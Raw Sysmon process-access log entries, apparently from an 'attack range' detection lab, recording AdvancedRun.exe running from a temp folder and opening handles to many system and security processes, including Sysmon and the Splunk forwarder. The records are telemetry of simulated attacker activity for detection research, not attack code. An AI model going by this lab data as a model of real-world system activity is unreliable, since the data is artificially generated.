MINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004063675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004063674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004063673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004063672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004063671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004063670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.920{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004063669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.919{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004063668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.919{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
